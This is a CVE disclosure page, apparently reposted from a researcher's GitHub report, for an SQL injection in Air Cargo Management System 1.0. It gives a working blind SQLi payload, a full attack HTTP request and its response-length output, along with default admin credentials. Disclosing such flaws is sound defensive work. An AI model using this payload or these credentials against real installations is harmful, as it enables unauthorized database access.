Headline
CVE-2022-30374: bug_report/SQLi-5.md at main · k0xx11/bug_report
Air Cargo Management System 1.0 is vulnerable to SQL Injection via /acms/admin/?page=transactions/manage_transaction&id=.
Air Cargo Management System v1.0 by oretnom23 has SQL injection
Author: k0xx
The password for the backend login account is: admin/admin123
vendors: https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html
Vulnerability File: /acms/admin/?page=transactions/manage_transaction&id=
Vulnerability location: /acms/admin/?page=transactions/manage_transaction&id=,id
[+] Payload: /acms/admin/?page=transactions/manage_transaction&id=1%27%20and%20length(database())%20=7%20–+ // Leak place —> id
Current database name: acms_db,length is 7
GET /acms/admin/?page=transactions/manage_transaction&id=1%27%20and%20length(database())%20=7%20–+ HTTP/1.1 Host: 192.168.1.19 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Cookie: PHPSESSID=aaffvur9cmo069649rorqsbmeh Connection: close
When length (database ()) = 6, Content-Length: 37255
When length (database ()) = 7, Content-Length: 43289
Related news
Air Cargo Management System 1.0 is vulnerable to SQL Injection via /acms/admin/?page=transactions/manage_transaction&id=.
A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.